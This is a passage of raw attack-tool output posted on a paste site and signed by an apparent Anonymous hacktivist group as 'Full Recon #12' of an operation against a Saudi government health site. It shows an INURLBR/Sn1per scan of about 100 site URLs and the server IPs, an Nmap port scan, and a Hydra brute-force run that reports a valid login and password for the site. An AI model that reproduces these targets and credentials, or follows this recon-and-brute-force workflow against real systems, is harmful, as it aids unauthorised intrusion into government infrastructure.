  1875. |_[ + ] Found:: UNIDENTIFIED
  1876. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  1877.  
  1878. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1879. |_[ + ] [ 55 / 100 ]-[00:16:54] [ - ]
  1880. |_[ + ] Target:: [ http://qh.gov.sa/author/25/ ]
  1881. |_[ + ] Exploit::
  1882. |_[ + ] Information Server:: , , IP:192.169.84.216:80
  1883. |_[ + ] More details:: / - / , ISP:
  1884. |_[ + ] Found:: UNIDENTIFIED
  1885. |_[ + ] ERROR CONECTION:: Operation timed out after 4999 milliseconds with 0 bytes received
  1886.  
  1887. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1888. |_[ + ] [ 56 / 100 ]-[00:17:00] [ - ]
  1889. |_[ + ] Target:: [ http://qh.gov.sa/albums/مبايعة/ ]
  1890. |_[ + ] Exploit::
  1891. |_[ + ] Information Server:: , , IP:192.169.84.216:80
  1892. |_[ + ] More details:: / - / , ISP:
  1893. |_[ + ] Found:: UNIDENTIFIED
  1894. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  1895.  
  1896. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1897. |_[ + ] [ 57 / 100 ]-[00:17:05] [ - ]
  1898. |_[ + ] Target:: [ http://qh.gov.sa/إدارة-الإمداد/ ]
  1899. |_[ + ] Exploit::
  1900. |_[ + ] Information Server:: , , IP:192.169.84.216:80
  1901. |_[ + ] More details:: / - / , ISP:
  1902. |_[ + ] Found:: UNIDENTIFIED
  1903. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  1904.  
  1905. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1906. |_[ + ] [ 58 / 100 ]-[00:17:10] [ - ]
  1907. |_[ + ] Target:: [ http://qh.gov.sa/albums/bur4/ ]
  1908. |_[ + ] Exploit::
  1909. |_[ + ] Information Server:: , , IP:192.169.84.216:80
  1910. |_[ + ] More details:: / - / , ISP:
  1911. |_[ + ] Found:: UNIDENTIFIED
  1912. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  1913.  
  1914. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1915. |_[ + ] [ 59 / 100 ]-[00:17:16] [ - ]
  1916. |_[ + ] Target:: [ http://qh.gov.sa/author/40/ ]
  1917. |_[ + ] Exploit::
  1918. |_[ + ] Information Server:: , , IP:192.169.84.216:80
  1919. |_[ + ] More details:: / - / , ISP:
  1920. |_[ + ] Found:: UNIDENTIFIED
  1921. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  1922.  
  1923. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1924. |_[ + ] [ 60 / 100 ]-[00:17:21] [ - ]
  1925. |_[ + ] Target:: [ http://qh.gov.sa/profile/444 ]
  1926. |_[ + ] Exploit::
  1927. |_[ + ] Information Server:: , , IP:192.169.84.216:80
  1928. |_[ + ] More details:: / - / , ISP:
  1929. |_[ + ] Found:: UNIDENTIFIED
  1930. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  1931.  
  1932. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1933. |_[ + ] [ 61 / 100 ]-[00:17:27] [ - ]
  1934. |_[ + ] Target:: [ http://qh.gov.sa/profile/552 ]
  1935. |_[ + ] Exploit::
  1936. |_[ + ] Information Server:: , , IP:192.169.84.216:80
  1937. |_[ + ] More details:: / - / , ISP:
  1938. |_[ + ] Found:: UNIDENTIFIED
  1939. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  1940.  
  1941. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1942. |_[ + ] [ 62 / 100 ]-[00:17:33] [ - ]
  1943. |_[ + ] Target:: [ http://qh.gov.sa/profile/371 ]
  1944. |_[ + ] Exploit::
  1945. |_[ + ] Information Server:: , , IP:192.169.84.216:80
  1946. |_[ + ] More details:: / - / , ISP:
  1947. |_[ + ] Found:: UNIDENTIFIED
  1948. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  1949.  
  1950. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1951. |_[ + ] [ 63 / 100 ]-[00:17:39] [ - ]
  1952. |_[ + ] Target:: [ http://qh.gov.sa/profile/431 ]
  1953. |_[ + ] Exploit::
  1954. |_[ + ] Information Server:: , , IP:192.169.84.216:80
  1955. |_[ + ] More details:: / - / , ISP:
  1956. |_[ + ] Found:: UNIDENTIFIED
  1957. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  1958.  
  1959. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1960. |_[ + ] [ 64 / 100 ]-[00:17:40] [ - ]
  1961. |_[ + ] Target:: [ http://jobs.qh.gov.sa/Admin ]
  1962. |_[ + ] Exploit::
  1963. |_[ + ] Information Server:: HTTP/1.1 302 Found, X-Powered-By: ASP.NET, IP:143.95.251.88:80
  1964. |_[ + ] More details:: / - / , ISP:
  1965. |_[ + ] Found:: UNIDENTIFIED
  1966.  
  1967. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1968. |_[ + ] [ 65 / 100 ]-[00:17:45] [ - ]
  1969. |_[ + ] Target:: [ http://qh.gov.sa/about-the-committee/ ]
  1970. |_[ + ] Exploit::
  1971. |_[ + ] Information Server:: , , IP:192.169.84.216:80
  1972. |_[ + ] More details:: / - / , ISP:
  1973. |_[ + ] Found:: UNIDENTIFIED
  1974. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  1975.  
  1976. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1977. |_[ + ] [ 66 / 100 ]-[00:17:51] [ - ]
  1978. |_[ + ] Target:: [ http://qh.gov.sa/convert/news/شري_باسمة/ ]
  1979. |_[ + ] Exploit::
  1980. |_[ + ] Information Server:: , , IP:192.169.84.216:80
  1981. |_[ + ] More details:: / - / , ISP:
  1982. |_[ + ] Found:: UNIDENTIFIED
  1983. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  1984.  
  1985. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1986. |_[ + ] [ 67 / 100 ]-[00:17:56] [ - ]
  1987. |_[ + ] Target:: [ http://qh.gov.sa/وحدة-المراجعة-الداخلية/ ]
  1988. |_[ + ] Exploit::
  1989. |_[ + ] Information Server:: , , IP:192.169.84.216:80
  1990. |_[ + ] More details:: / - / , ISP:
  1991. |_[ + ] Found:: UNIDENTIFIED
  1992. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  1993.  
  1994. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1995. |_[ + ] [ 68 / 100 ]-[00:18:02] [ - ]
  1996. |_[ + ] Target:: [ http://qh.gov.sa/متطلبات-تقديم-البحوث/ ]
  1997. |_[ + ] Exploit::
  1998. |_[ + ] Information Server:: , , IP:192.169.84.216:80
  1999. |_[ + ] More details:: / - / , ISP:
  2000. |_[ + ] Found:: UNIDENTIFIED
  2001. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  2002.  
  2003. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2004. |_[ + ] [ 69 / 100 ]-[00:18:07] [ - ]
  2005. |_[ + ] Target:: [ http://qh.gov.sa/إدارة-التخطيط-والتدريب/ ]
  2006. |_[ + ] Exploit::
  2007. |_[ + ] Information Server:: , , IP:192.169.84.216:80
  2008. |_[ + ] More details:: / - / , ISP:
  2009. |_[ + ] Found:: UNIDENTIFIED
  2010. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  2011.  
  2012. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2013. |_[ + ] [ 70 / 100 ]-[00:18:13] [ - ]
  2014. |_[ + ] Target:: [ http://qh.gov.sa/cnews/أخبار-الصحة/ ]
  2015. |_[ + ] Exploit::
  2016. |_[ + ] Information Server:: , , IP:192.169.84.216:80
  2017. |_[ + ] More details:: / - / , ISP:
  2018. |_[ + ] Found:: UNIDENTIFIED
  2019. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  2020.  
  2021. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2022. |_[ + ] [ 71 / 100 ]-[00:18:18] [ - ]
  2023. |_[ + ] Target:: [ http://qh.gov.sa/ادارة-الصحة-العامة/ ]
  2024. |_[ + ] Exploit::
  2025. |_[ + ] Information Server:: , , IP:192.169.84.216:80
  2026. |_[ + ] More details:: / - / , ISP:
  2027. |_[ + ] Found:: UNIDENTIFIED
  2028. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  2029.  
  2030. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2031. |_[ + ] [ 72 / 100 ]-[00:18:23] [ - ]
  2032. |_[ + ] Target:: [ http://qh.gov.sa/author/20-2/ ]
  2033. |_[ + ] Exploit::
  2034. |_[ + ] Information Server:: , , IP:192.169.84.216:80
  2035. |_[ + ] More details:: / - / , ISP:
  2036. |_[ + ] Found:: UNIDENTIFIED
  2037. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  2038.  
  2039. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2040. |_[ + ] [ 73 / 100 ]-[00:18:29] [ - ]
  2041. |_[ + ] Target:: [ http://qh.gov.sa/news/بيان-صحفي/ ]
  2042. |_[ + ] Exploit::
  2043. |_[ + ] Information Server:: , , IP:192.169.84.216:80
  2044. |_[ + ] More details:: / - / , ISP:
  2045. |_[ + ] Found:: UNIDENTIFIED
  2046. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  2047.  
  2048. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2049. |_[ + ] [ 74 / 100 ]-[00:18:35] [ - ]
  2050. |_[ + ] Target:: [ http://qh.gov.sa/news/page/866/ ]
  2051. |_[ + ] Exploit::
  2052. |_[ + ] Information Server:: , , IP:192.169.84.216:80
  2053. |_[ + ] More details:: / - / , ISP:
  2054. |_[ + ] Found:: UNIDENTIFIED
  2055. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  2056.  
  2057. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2058. |_[ + ] [ 75 / 100 ]-[00:18:40] [ - ]
  2059. |_[ + ] Target:: [ http://qh.gov.sa/news/اجتماع-المجلس/ ]
  2060. |_[ + ] Exploit::
  2061. |_[ + ] Information Server:: , , IP:192.169.84.216:80
  2062. |_[ + ] More details:: / - / , ISP:
  2063. |_[ + ] Found:: UNIDENTIFIED
  2064. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  2065.  
  2066. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2067. |_[ + ] [ 76 / 100 ]-[00:18:45] [ - ]
  2068. |_[ + ] Target:: [ http://qh.gov.sa/news/page/864/ ]
  2069. |_[ + ] Exploit::
  2070. |_[ + ] Information Server:: , , IP:192.169.84.216:80
  2071. |_[ + ] More details:: / - / , ISP:
  2072. |_[ + ] Found:: UNIDENTIFIED
  2073. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  2074.  
  2075. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2076. |_[ + ] [ 77 / 100 ]-[00:18:51] [ - ]
  2077. |_[ + ] Target:: [ http://qh.gov.sa/category/مقالات-اجتماعية/ ]
  2078. |_[ + ] Exploit::
  2079. |_[ + ] Information Server:: , , IP:192.169.84.216:80
  2080. |_[ + ] More details:: / - / , ISP:
  2081. |_[ + ] Found:: UNIDENTIFIED
  2082. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  2083.  
  2084. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2085. |_[ + ] [ 78 / 100 ]-[00:18:56] [ - ]
  2086. |_[ + ] Target:: [ http://qh.gov.sa/news/page/862/ ]
  2087. |_[ + ] Exploit::
  2088. |_[ + ] Information Server:: , , IP:192.169.84.216:80
  2089. |_[ + ] More details:: / - / , ISP:
  2090. |_[ + ] Found:: UNIDENTIFIED
  2091. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  2092.  
  2093. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2094. |_[ + ] [ 79 / 100 ]-[00:19:02] [ - ]
  2095. |_[ + ] Target:: [ http://qh.gov.sa/cnews/اخبار-متفرقة/ ]
  2096. |_[ + ] Exploit::
  2097. |_[ + ] Information Server:: , , IP:192.169.84.216:80
  2098. |_[ + ] More details:: / - / , ISP:
  2099. |_[ + ] Found:: UNIDENTIFIED
  2100. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  2101.  
  2102. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2103. |_[ + ] [ 80 / 100 ]-[00:19:07] [ - ]
  2104. |_[ + ] Target:: [ http://qh.gov.sa/author/-19/ ]
  2105. |_[ + ] Exploit::
  2106. |_[ + ] Information Server:: , , IP:192.169.84.216:80
  2107. |_[ + ] More details:: / - / , ISP:
  2108. |_[ + ] Found:: UNIDENTIFIED
  2109. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  2110.  
  2111. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2112. |_[ + ] [ 81 / 100 ]-[00:19:12] [ - ]
  2113. |_[ + ] Target:: [ http://qh.gov.sa/convert/أرشيف-الأخبار/ ]
  2114. |_[ + ] Exploit::
  2115. |_[ + ] Information Server:: , , IP:192.169.84.216:80
  2116. |_[ + ] More details:: / - / , ISP:
  2117. |_[ + ] Found:: UNIDENTIFIED
  2118. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  2119.  
  2120. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2121. |_[ + ] [ 82 / 100 ]-[00:19:18] [ - ]
  2122. |_[ + ] Target:: [ http://qh.gov.sa/news/page/865/ ]
  2123. |_[ + ] Exploit::
  2124. |_[ + ] Information Server:: , , IP:192.169.84.216:80
  2125. |_[ + ] More details:: / - / , ISP:
  2126. |_[ + ] Found:: UNIDENTIFIED
  2127. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  2128.  
  2129. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2130. |_[ + ] [ 83 / 100 ]-[00:19:23] [ - ]
  2131. |_[ + ] Target:: [ http://qh.gov.sa/cnews/المجتمع-الصحي/ ]
  2132. |_[ + ] Exploit::
  2133. |_[ + ] Information Server:: , , IP:192.169.84.216:80
  2134. |_[ + ] More details:: / - / , ISP:
  2135. |_[ + ] Found:: UNIDENTIFIED
  2136. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  2137.  
  2138. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2139. |_[ + ] [ 84 / 100 ]-[00:19:29] [ - ]
  2140. |_[ + ] Target:: [ http://qh.gov.sa/author/19-2/ ]
  2141. |_[ + ] Exploit::
  2142. |_[ + ] Information Server:: , , IP:192.169.84.216:80
  2143. |_[ + ] More details:: / - / , ISP:
  2144. |_[ + ] Found:: UNIDENTIFIED
  2145. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  2146.  
  2147. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2148. |_[ + ] [ 85 / 100 ]-[00:19:34] [ - ]
  2149. |_[ + ] Target:: [ http://qh.gov.sa/إدارة-التوعية-الدينية/ ]
  2150. |_[ + ] Exploit::
  2151. |_[ + ] Information Server:: , , IP:192.169.84.216:80
  2152. |_[ + ] More details:: / - / , ISP:
  2153. |_[ + ] Found:: UNIDENTIFIED
  2154. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  2155.  
  2156. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2157. |_[ + ] [ 86 / 100 ]-[00:19:40] [ - ]
  2158. |_[ + ] Target:: [ http://qh.gov.sa/news/page/863/ ]
  2159. |_[ + ] Exploit::
  2160. |_[ + ] Information Server:: , , IP:192.169.84.216:80
  2161. |_[ + ] More details:: / - / , ISP:
  2162. |_[ + ] Found:: UNIDENTIFIED
  2163. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  2164.  
  2165. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2166. |_[ + ] [ 87 / 100 ]-[00:19:45] [ - ]
  2167. |_[ + ] Target:: [ http://qh.gov.sa/convert/تقويم-الأنشطة/ ]
  2168. |_[ + ] Exploit::
  2169. |_[ + ] Information Server:: , , IP:192.169.84.216:80
  2170. |_[ + ] More details:: / - / , ISP:
  2171. |_[ + ] Found:: UNIDENTIFIED
  2172. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  2173.  
  2174. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2175. |_[ + ] [ 88 / 100 ]-[00:19:50] [ - ]
  2176. |_[ + ] Target:: [ http://qh.gov.sa/news/مولوده-للتويجري/ ]
  2177. |_[ + ] Exploit::
  2178. |_[ + ] Information Server:: , , IP:192.169.84.216:80
  2179. |_[ + ] More details:: / - / , ISP:
  2180. |_[ + ] Found:: UNIDENTIFIED
  2181. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  2182.  
  2183. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2184. |_[ + ] [ 89 / 100 ]-[00:19:56] [ - ]
  2185. |_[ + ] Target:: [ http://qh.gov.sa/albums/لصحتهم-منعناها/ ]
  2186. |_[ + ] Exploit::
  2187. |_[ + ] Information Server:: , , IP:192.169.84.216:80
  2188. |_[ + ] More details:: / - / , ISP:
  2189. |_[ + ] Found:: UNIDENTIFIED
  2190. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  2191.  
  2192. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2193. |_[ + ] [ 90 / 100 ]-[00:20:01] [ - ]
  2194. |_[ + ] Target:: [ http://qh.gov.sa/album/s/115 ]
  2195. |_[ + ] Exploit::
  2196. |_[ + ] Information Server:: , , IP:192.169.84.216:80
  2197. |_[ + ] More details:: / - / , ISP:
  2198. |_[ + ] Found:: UNIDENTIFIED
  2199. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  2200.  
  2201. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2202. |_[ + ] [ 91 / 100 ]-[00:20:04] [ - ]
  2203. |_[ + ] Target:: [ http://qh.gov.sa/author/-22/ ]
  2204. |_[ + ] Exploit::
  2205. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:192.169.84.216:80
  2206. |_[ + ] More details:: / - / , ISP:
  2207. |_[ + ] Found:: UNIDENTIFIED
  2208.  
  2209. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2210. |_[ + ] [ 92 / 100 ]-[00:20:06] [ - ]
  2211. |_[ + ] Target:: [ http://qh.gov.sa/new/s/8992 ]
  2212. |_[ + ] Exploit::
  2213. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, , IP:192.169.84.216:80
  2214. |_[ + ] More details:: / - / , ISP:
  2215. |_[ + ] Found:: UNIDENTIFIED
  2216.  
  2217. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2218. |_[ + ] [ 93 / 100 ]-[00:20:08] [ - ]
  2219. |_[ + ] Target:: [ http://jobs.qh.gov.sa/Seeker/FPassword ]
  2220. |_[ + ] Exploit::
  2221. |_[ + ] Information Server:: HTTP/1.1 200 OK, X-Powered-By: ASP.NET, IP:143.95.251.88:80
  2222. |_[ + ] More details:: / - / , ISP:
  2223. |_[ + ] Found:: UNIDENTIFIED
  2224.  
  2225. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2226. |_[ + ] [ 94 / 100 ]-[00:20:12] [ - ]
  2227. |_[ + ] Target:: [ http://qh.gov.sa/cnews/الارشيف/page/98/ ]
  2228. |_[ + ] Exploit::
  2229. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:192.169.84.216:80
  2230. |_[ + ] More details:: / - / , ISP:
  2231. |_[ + ] Found:: UNIDENTIFIED
  2232.  
  2233. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2234. |_[ + ] [ 95 / 100 ]-[00:20:16] [ - ]
  2235. |_[ + ] Target:: [ http://qh.gov.sa/privacy-policy-2/25/ ]
  2236. |_[ + ] Exploit::
  2237. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:192.169.84.216:80
  2238. |_[ + ] More details:: / - / , ISP:
  2239. |_[ + ] Found:: UNIDENTIFIED
  2240.  
  2241. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2242. |_[ + ] [ 96 / 100 ]-[00:20:20] [ - ]
  2243. |_[ + ] Target:: [ http://qh.gov.sa/cnews/الارشيف/page/223/ ]
  2244. |_[ + ] Exploit::
  2245. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:192.169.84.216:80
  2246. |_[ + ] More details:: / - / , ISP:
  2247. |_[ + ] Found:: UNIDENTIFIED
  2248.  
  2249. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2250. |_[ + ] [ 97 / 100 ]-[00:20:23] [ - ]
  2251. |_[ + ] Target:: [ http://qh.gov.sa/cnews/الارشيف/page/52/ ]
  2252. |_[ + ] Exploit::
  2253. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:192.169.84.216:80
  2254. |_[ + ] More details:: / - / , ISP:
  2255. |_[ + ] Found:: UNIDENTIFIED
  2256.  
  2257. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2258. |_[ + ] [ 98 / 100 ]-[00:20:25] [ - ]
  2259. |_[ + ] Target:: [ http://qh.gov.sa/cnews/الارشيف/page/2/ ]
  2260. |_[ + ] Exploit::
  2261. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:192.169.84.216:80
  2262. |_[ + ] More details:: / - / , ISP:
  2263. |_[ + ] Found:: UNIDENTIFIED
  2264.  
  2265. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2266. |_[ + ] [ 99 / 100 ]-[00:20:27] [ - ]
  2267. |_[ + ] Target:: [ http://qh.gov.sa/cnews/الارشيف/page/180/ ]
  2268. |_[ + ] Exploit::
  2269. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:192.169.84.216:80
  2270. |_[ + ] More details:: / - / , ISP:
  2271. |_[ + ] Found:: UNIDENTIFIED
  2272.  
  2273. [ INFO ] [ Shutting down ]
  2274. [ INFO ] [ End of process INURLBR at [19-11-2018 00:20:27]
  2275. [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
  2276. [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/plugins/slurp/output/inurlbr-qh.gov.sa.txt ]
  2277. |_________________________________________________________________________________________
  2278.  
  2279. \_________________________________________________________________________________________/
  2280. #######################################################################################################################################
  2281. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-19 00:21 EST
  2282. Nmap scan report for qh.gov.sa (192.169.84.216)
  2283. Host is up (0.11s latency).
  2284. Not shown: 22 filtered ports, 3 closed ports
  2285. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  2286. PORT STATE SERVICE
  2287. 80/tcp open http
  2288. #######################################################################################################################################
  2289. + -- --=[Port 21 closed... skipping.
  2290. + -- --=[Port 22 closed... skipping.
  2291. + -- --=[Port 23 closed... skipping.
  2292. + -- --=[Port 25 closed... skipping.
  2293. + -- --=[Port 80 opened... running tests...
  2294. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  2295.  
  2296. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-19 00:22:18
  2297. [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
  2298. [DATA] attacking http-get://qh.gov.sa:80//
  2299. [STATUS] 2.00 tries/min, 2 tries in 00:01h, 1528 to do in 12:45h, 1 active
  2300. [STATUS] 2.00 tries/min, 6 tries in 00:03h, 1524 to do in 12:43h, 1 active
  2301. [STATUS] 1.86 tries/min, 13 tries in 00:07h, 1517 to do in 13:37h, 1 active
  2302. [STATUS] 1.87 tries/min, 28 tries in 00:15h, 1502 to do in 13:25h, 1 active
  2303. [STATUS] 1.87 tries/min, 58 tries in 00:31h, 1472 to do in 13:07h, 1 active
  2304. [STATUS] 1.86 tries/min, 67 tries in 00:36h, 1463 to do in 13:07h, 1 active
  2305. [STATUS] 1.88 tries/min, 77 tries in 00:41h, 1453 to do in 12:54h, 1 active
  2306. [STATUS] 1.87 tries/min, 86 tries in 00:46h, 1444 to do in 12:53h, 1 active
  2307. [80][http-get] host: qh.gov.sa login: anonymous password: alpine
  2308. [STATUS] attack finished for qh.gov.sa (valid pair found)
  2309. 1 of 1 target successfully completed, 1 valid password found
  2310. Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-19 01:13:16
  2311. #######################################################################################################################################
  2312. Anonymous JTSEC #OpJamalKhashoggi Full Recon #12
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement